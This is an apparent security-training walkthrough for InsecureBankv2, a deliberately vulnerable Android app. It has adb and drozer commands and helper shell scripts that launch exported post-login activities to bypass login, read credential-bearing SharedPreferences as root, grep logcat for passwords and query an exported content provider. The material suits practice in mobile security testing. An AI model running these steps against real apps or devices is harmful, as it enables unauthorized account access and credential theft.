InsecureBankv2 is a vulnerable-by-design Android application created for security analysts to practice reverse engineering, static analysis (SAST), and dynamic analysis (DAST).
# Decompile resources and AndroidManifest.xml using apktool:
apktool d InsecureBankv2.apk -o InsecureBank_Source
# Decompile directly to readable Java code using JADX:
jadx-gui InsecureBankv2.apk
A good analyst first reviews what the app requests in the AndroidManifest.xml.
Reviewing the AndroidManifest.xml shows that several post-login activities, including .PostLogin, .DoTransfer and .ChangePassword, carry android:exported="true". An exported activity can be started by any other app on the device (or by adb, which runs as the shell user), so the login screen and the check it performs are skipped entirely. Use the Android Debug Bridge (ADB) and the Activity Manager (am) to launch these screens directly on the connected device:
adb shell
am start -n com.android.insecurebankv2/.PostLogin
am start -n com.android.insecurebankv2/.ChangePassword
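To make the manifest review repeatable, here is an added shell example (not code from the original page or the InsecureBankv2 project) that pulls every externally startable activity out of an apktool-decoded AndroidManifest.xml and prints the matching am start commands. The manifest it reads is a constructed fragment that only imitates the real file's shape; the function names exported_activities and launch_commands are my own. It also reports activities that have no android:exported attribute but declare an intent-filter, which Android exports by default when the app targets SDK 30 or lower.

```shell
#!/bin/sh
# Added example, not from the original page or the InsecureBankv2 project.
# The manifest below is a CONSTRUCTED fragment that only mimics the real file.
MANIFEST=$(mktemp)
trap 'rm -f "$MANIFEST"' EXIT
cat > "$MANIFEST" <<'EOF'
<manifest xmlns:android="http://schemas.android.com/apk/res/android"
    package="com.android.insecurebankv2">
    <application android:allowBackup="true" android:debuggable="true">
        <activity android:name=".LoginActivity">
            <intent-filter>
                <action android:name="android.intent.action.MAIN"/>
                <category android:name="android.intent.category.LAUNCHER"/>
            </intent-filter>
        </activity>
        <activity android:name=".PostLogin" android:exported="true"/>
        <activity android:name=".DoTransfer"
            android:exported="true"/>
        <activity android:name=".ChangePassword" android:exported="true"/>
        <activity android:name=".ViewStatement" android:exported="false"/>
    </application>
</manifest>
EOF

# Print "NAME<TAB>explicit|implicit" for every activity that can be started from
# outside the app. "implicit" means no android:exported attribute but an
# <intent-filter>, which Android exports by default when targetSdk < 31.
exported_activities() {
    awk '
        /<activity[ >]/ { tag = ""; intag = 1 }          # start tag may span lines
        intag { tag = tag " " $0 }
        intag && />/ {                                    # start tag complete
            intag = 0; name = ""
            if (match(tag, /android:name="[^"]+"/))
                name = substr(tag, RSTART + 14, RLENGTH - 15)
            if (tag ~ /android:exported="true"/) { print name "\texplicit"; name = "" }
            else if (tag ~ /android:exported="false"/ || tag ~ /\/>/) { name = "" }
            next
        }
        name != "" && /<intent-filter/ { print name "\timplicit"; name = "" }
        /<\/activity>/ { name = "" }
    ' "$1"
}

# Turn the list into the adb invocations used above (run them with a device attached).
launch_commands() {
    pkg=$1; manifest=$2
    exported_activities "$manifest" | while read -r name why; do
        printf 'adb shell am start -n %s/%s   # %s\n' "$pkg" "$name" "$why"
    done
}

launch_commands com.android.insecurebankv2 "$MANIFEST"
```

Against the real decoded output, point it at InsecureBank_Source/AndroidManifest.xml instead of the sample. Being exported only means the activity can be reached; whether it does anything useful without the session state the app expects is what the manual am start invocations above tell you.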
Storing sensitive data unencrypted on the device is one of the most common mobile findings (OWASP Mobile Top 10: Insecure Data Storage). Check the logcat output, the SharedPreferences XML files and the rest of the app's private data directory:
# Monitor logs for hardcoded credentials being printed:
adb logcat | grep "insecurebankv2"
# Check Shared Preferences for plaintext passwords (Requires Root):
adb shell
su
cat /data/data/com.android.insecurebankv2/shared_prefs/mySharedPreferences.xml
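Once the preferences file and a logcat capture are on the workstation, the triage can be scripted. This added shell example (not code from the original page or the InsecureBankv2 project) classifies every string in a shared_prefs XML as plaintext, base64-encoded plaintext, or encoded data that is not readable after a base64 decode, and filters a saved logcat capture for credential-like lines. Both inputs are constructed samples, not real device output; the key names, values and log lines are made up to match the shape of the real files, and scan_prefs and scan_logcat are my own function names.

```shell
#!/bin/sh
# Added example, not from the original page or the InsecureBankv2 project.
# Both inputs below are CONSTRUCTED samples, not pulled from a device.
PREFS=$(mktemp); LOG=$(mktemp)
trap 'rm -f "$PREFS" "$LOG"' EXIT
cat > "$PREFS" <<'EOF'
<?xml version='1.0' encoding='utf-8' standalone='yes' ?>
<map>
    <string name="EncryptedUsername">ZGV2YWRtaW4=</string>
    <string name="superSecurePassword">Ct/R1kQ0rJ8=</string>
    <string name="serverip">10.0.2.2</string>
    <string name="serverport">8888</string>
</map>
EOF
cat > "$LOG" <<'EOF'
D/ActivityManager(  812): Start proc 4321:com.android.insecurebankv2/u0a88
V/InsecureBankv2(4321): Successful Login: user=devadmin pass=Dev4dm1n!
I/Choreographer(4321): Skipped 30 frames!  The application may be doing too much work.
D/InsecureBankv2(4321): ChangePassword: new password = N3wPass!
EOF

# Print "KEY|FLAG|CLASS|DETAIL" for every <string> entry. A base64 decode is
# attempted when the value has base64 shape (length >= 8 and a multiple of 4);
# if the result is printable it is shown, otherwise the value is reported as
# "encoded" so you know to look for the key material in the decompiled source.
# Values containing "|" would break the field split; none do here.
scan_prefs() {
    sed -n 's/^[[:space:]]*<string name="\([^"]*\)">\([^<]*\)<\/string>.*/\1|\2/p' "$1" |
    while IFS='|' read -r key val; do
        case "$key" in
            *[Pp]ass*|*[Pp]wd*|*[Ss]ecret*|*[Tt]oken*|*[Uu]ser*|*[Kk]ey*) flag=SENSITIVE ;;
            *) flag=- ;;
        esac
        class=plaintext; detail=$val
        if printf '%s' "$val" | grep -Eq '^[A-Za-z0-9+/]{8,}={0,2}$' && [ $(( ${#val} % 4 )) -eq 0 ]; then
            nonprint=$(( $(printf '%s' "$val" | base64 -d 2>/dev/null | LC_ALL=C tr -d '[:print:]' | wc -c) ))
            if [ "$nonprint" -eq 0 ]; then
                class=base64; detail=$(printf '%s' "$val" | base64 -d 2>/dev/null)
            else
                class=encoded; detail='not printable after base64 decode: look for a hardcoded key in the decompiled source'
            fi
        fi
        printf '%s|%s|%s|%s\n' "$key" "$flag" "$class" "$detail"
    done
}

# Keep only lines that mention the app and credential-like material; this is the
# "adb logcat | grep" step above applied to a saved capture.
scan_logcat() {
    grep -i 'insecurebankv2' "$1" | grep -iE 'pass|pwd|login|credential|token|secret'
}

scan_prefs "$PREFS"
scan_logcat "$LOG"
```

To run it against a real pull, replace the sample files with the output of `adb pull /data/data/com.android.insecurebankv2/shared_prefs/` (root required) and `adb logcat -d > capture.txt`. An "encoded" verdict is not a pass: if the key used to produce that value is hardcoded in the APK, it is recoverable from the JADX output.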
Drozer runs as an agent app on the device and exercises the IPC (Inter-Process Communication) attack surface that other apps expose: exported activities, broadcast receivers, services and content providers. Enumerate the attack surface first, then query the exported content provider:
dz> run app.package.attacksurface com.android.insecurebankv2
dz> run app.provider.query content://com.android.insecurebankv2.TrackUserContentProvider/trackerusers
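The same provider query does not need drozer: the stock Android content tool, driven through adb, can query any exported provider. This added shell example (not code from the original page or the InsecureBankv2 project) wraps that call and flattens the tool's "Row: N col=val, col=val" output to one record per line so results can be diffed or grepped. The sample output it parses is constructed, not captured from a device, and query_provider and parse_rows are my own function names.

```shell
#!/bin/sh
# Added example, not from the original page or the InsecureBankv2 project.
# The provider output below is a CONSTRUCTED sample in the format the Android
# "content query" tool prints; the ids and names are made up.
SAMPLE=$(mktemp)
trap 'rm -f "$SAMPLE"' EXIT
cat > "$SAMPLE" <<'EOF'
Row: 0 id=1, name=devadmin
Row: 1 id=2, name=jack
EOF

# Needs an attached device. The provider must be exported for this to succeed,
# exactly as with drozer's app.provider.query.
query_provider() {
    adb shell content query --uri "$1"
}

# Drop the "Row: N " prefix and turn the ", " column separators into "|".
parse_rows() {
    sed -e 's/^Row: [0-9]* //' -e 's/, /|/g' "$1"
}

# Offline demo on the constructed sample. Against a device:
#   query_provider content://com.android.insecurebankv2.TrackUserContentProvider/trackerusers > rows.txt
#   parse_rows rows.txt
parse_rows "$SAMPLE"
```

If the query is refused with a permission error, the provider is not exported (or is protected by a permission) and the finding does not apply; if it returns rows without any permission, every app on the device can read them.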